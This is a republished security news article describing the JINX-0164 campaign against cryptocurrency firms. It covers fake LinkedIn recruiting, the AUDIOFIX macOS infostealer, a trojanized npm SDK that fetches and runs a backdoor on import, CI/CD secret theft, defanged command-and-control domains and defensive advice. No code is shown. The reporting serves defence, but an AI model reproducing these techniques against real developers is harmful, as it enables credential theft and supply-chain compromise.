A sophisticated threat actor tracked as JINX-0164 is actively targeting cryptocurrency organizations through a multi-stage attack chain that begins with LinkedIn social engineering and culminates in the deployment of custom macOS malware, credential theft, and software supply chain compromise.
Attack Chain: From LinkedIn to Full Infrastructure Compromise
Identified by Wiz Research and Wiz CIRT, JINX-0164 has been active since at least mid-2025 and is financially motivated. The operation begins with a convincing LinkedIn profile that initiates contact under the guise of a business opportunity or job offer, then directs victims to a fake conferencing platform mimicking Microsoft Teams or similar services.
Clicking the meeting link triggers the download of AUDIOFIX, a compiled Python-based infostealer and backdoor that immediately begins harvesting browser credentials, cryptocurrency wallet extensions, SSH keys, cloud API tokens, and clipboard data. The malware communicates over encrypted HTTPS using AES-256-CBC encryption and employs randomized polling intervals to evade detection.
In one documented case, the entire attack chain unfolded over two weeks, moving from a LinkedIn message to full infrastructure compromise. The payload disguised itself as a system audio component named coreaudiod, was saved as ChromeUpdater, and established persistence via launchctl.
Supply Chain Sabotage Through Trojanized npm Package
On April 7, 2026, JINX-0164 escalated its operations by compromising version 4.9.1 of the npm package @velora-dex/sdk, a widely used cryptocurrency SDK. The group appended code that would download and execute a shell script whenever the package was imported by any project, delivering MINIRAT, a lightweight Go-based backdoor that provides persistent remote access and command execution capabilities.
The threat actor also tampered with Git commit metadata to impersonate legitimate developers and pushed malicious code directly into internal repositories. Using an open-source tool called nord-stream, attackers exfiltrated secrets from CI/CD pipelines and spread infected code to every developer who pulled from those branches.
To further obfuscate their activity, JINX-0164 routed network traffic through commercial VPN services including ExpressVPN, Astrill VPN, and Mullvad VPN, complicating attribution efforts.
Defensive Recommendations and Indicators of Compromise
Organizations should deploy endpoint detection and response solutions and enable audit logging across all cloud platforms and version control systems. Security teams must monitor for unverified commits in GitHub, unexpected VPN usage, and anomalous workflow activity in CI/CD pipelines.
Enabling GitHub Vigilant Mode can help surface developer impersonation attempts through unsigned or mismatched commits. Teams should also flag any use of nord-stream and scrutinize new code package publications originating from unfamiliar IP addresses.
Key indicators of compromise include multiple SHA-256 hashes for AUDIOFIX and MINIRAT variants, command-and-control domains such as datahub[.]ink and cloud-sync[.]online, and payload delivery domains including apple[.]driver-store[.]com and driver-updater[.]net.
What This Means for the Industry
JINX-0164 represents a dangerous evolution in targeted macOS malware campaigns, combining sophisticated social engineering with supply chain sabotage in a single, seamless operation. The group’s ability to compromise both individual developers and shared infrastructure underscores a critical reality: the software development pipeline itself has become the attack surface. For cryptocurrency organizations and the broader tech sector, trust in identity alone is no longer sufficient — every link, every package, and every commit must be treated as a potential vector.
— Originally reported by Cyber Security News. Adapted and republished with editorial context for MacThreat.
